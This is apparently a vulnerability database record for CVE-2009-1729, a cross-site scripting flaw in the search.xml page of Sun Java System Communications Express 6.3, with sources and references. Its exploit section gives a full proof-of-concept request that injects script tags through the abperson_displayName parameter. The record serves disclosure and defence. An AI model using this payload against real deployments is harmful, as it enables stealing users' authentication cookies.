ID

VAR-E-200905-0102


CVE

cve_id:CVE-2009-1729

Trust: 2.4

sources: BID: 34154 // PACKETSTORM: 77704 // EXPLOIT-DB: 32863 // EDBNET: 54370

EDB ID

32863


TITLE

Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting - Java webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32863

DESCRIPTION

Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting. CVE-2009-1729CVE-54610 . webapps exploit for Java platform

Trust: 0.6

sources: EXPLOIT-DB: 32863

AFFECTED PRODUCTS

vendor:sunmodel:java system communications expressscope:eqversion:6.3

Trust: 1.9

vendor:sunmodel:java system communications express 2005q4scope: - version: -

Trust: 0.3

sources: BID: 34154 // EXPLOIT-DB: 32863 // EDBNET: 54370

EXPLOIT

source: https://www.securityfocus.com/bid/34154/info

Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

https://www.example.com/uwc/abs/search.xml?bookid=e11e46531a8a0&j_encoding=UTF-8&uiaction=quickaddcontact&entryid=&valueseparator=%3B&prefix=abperson_&stopalreadyselected=1&isselchanged=0&idstoadd=&selectedbookid=&type=abperson%2Cgroup&wcfg_groupview=&wcfg_searchmode=&stopsearch=1&expandgroup=&expandselectedgroup=&expandonmissing=&nextview=&bookid=e11e46531a8a0&actionbookid=e11e46531a8a0&searchid=7&filter=entry%2Fdisplayname%3D*&firstentry=0&sortby=%2Bentry%2Fdisplayname&curbookid=e11e46531a8a0&searchelem=0&searchby=contains&searchstring=Search+for&searchbookid=e11e46531a8a0&abperson_givenName=aa&abperson_sn=aa&abperson_piEmail1=a%40a.com&abperson_piEmail1Type=work&abperson_piPhone1=11&abperson_piPhone1Type=work&quickaddprefix=abperson_&abperson_displayName=%3Cscript%3Ealert%28%27xss2%27%29%3C%2Fscript%3E%2C+%3Cscript%3Ealert%28%27xss1%27%29%3C%2Fscript%3E&abperson_entrytype=abperson&abperson_memberOfPIBook=e11e46531a8a0

Trust: 1.0

sources: EXPLOIT-DB: 32863

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 32863

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32863

TYPE

'search.xml' Cross-Site Scripting

Trust: 1.0

sources: EXPLOIT-DB: 32863

TAGS

tag:exploit

Trust: 0.5

tag:java

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 77704

CREDITS

SCS team

Trust: 0.6

sources: EXPLOIT-DB: 32863

EXTERNAL IDS

db:NVDid:CVE-2009-1729

Trust: 2.4

db:EXPLOIT-DBid:32863

Trust: 1.9

db:BIDid:34154

Trust: 1.9

db:EDBNETid:54370

Trust: 0.6

db:PACKETSTORMid:77704

Trust: 0.5

sources: BID: 34154 // PACKETSTORM: 77704 // EXPLOIT-DB: 32863 // EDBNET: 54370

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2009-1729

Trust: 2.1

url:https://www.securityfocus.com/bid/34154/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/32863/

Trust: 0.6

url:http://www.coresecurity.com/content/sun-communications-express

Trust: 0.3

url:https://www.exploit-db.com/exploits/32863

Trust: 0.3

url:http://www.sun.com/software/products/calendar_srvr/comms_express/index.xml

Trust: 0.3

url:http://sunsolve.sun.com/search/document.do?assetkey=1-66-258068-1

Trust: 0.3

sources: BID: 34154 // PACKETSTORM: 77704 // EXPLOIT-DB: 32863 // EDBNET: 54370

SOURCES

db:BIDid:34154
db:PACKETSTORMid:77704
db:EXPLOIT-DBid:32863
db:EDBNETid:54370

LAST UPDATE DATE

2022-07-27T09:13:09.942000+00:00


SOURCES UPDATE DATE

db:BIDid:34154date:2009-05-21T16:20:00

SOURCES RELEASE DATE

db:BIDid:34154date:2009-05-20T00:00:00
db:PACKETSTORMid:77704date:2009-05-21T06:23:41
db:EXPLOIT-DBid:32863date:2009-05-20T00:00:00
db:EDBNETid:54370date:2009-05-20T00:00:00